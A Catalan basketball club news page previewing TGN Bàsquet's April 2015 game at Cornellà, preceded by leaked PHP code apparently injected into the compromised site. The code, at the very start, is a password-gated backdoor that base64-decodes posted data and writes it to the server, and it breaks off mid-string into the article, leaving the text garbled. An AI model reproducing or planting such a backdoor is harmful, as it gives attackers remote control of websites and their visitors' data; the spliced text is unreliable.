function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet visita el Cornellà (diumenge, 12.15h) en el partit previ al derbi - Tgn Bàsquet Club -

El Nemser TGN Bàsquet visita el Cornellà (diumenge, 12.15h) en el partit previ al derbi

By
Updated: abril 25, 2015

El Nemser TGN Bàsquet busca mantenir la seva ratxa victoriosa amb la visita d’un dels equips que intenten fugir de la zona de les eliminatòries de descens. El conjunt lila juga demà diumenge a la pista del Cornellà (12.15 h) en un partit que pot representar l’onzena victòria seguida de l’equip que entrena Jordi Hernández en la setmana prèvia al derbi tarragoní que es disputarà dissabte 2 de maig a dos quarts de set de la tarda al pavelló del Sagrat Cor.

El Nemser actualment ocupa la cinquena posició amb un balanç de 17 victòries i 9 derrotes, mentre que el seu rival, el Cornellà, és l’onzè classificat amb 10 victòries i 16 derrotes. “És un equip molt jove, que necessita guanyar sí o sí, per evitar aquestes posicions que obliguen a jugar les eliminatòries de descens”, diu Jordi Hernández. El tècnic destaca la velocitat i l’alt ritme de joc del Cornellà com a principals armes en un partit en què no podrà comptar amb Ester Cabré. “La nostra dinàmica és bona i estem entrenant bé les últimes setmanes. Amb tot, no ens preocupa massa el nombre de victòries seguides que hem aconseguit, sinó el nostre treball diari”, diu.

En el partit de la primera volta, el Nemser TGN Bàsquet va vèncer el Cornellà per un resultat de 72-49.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *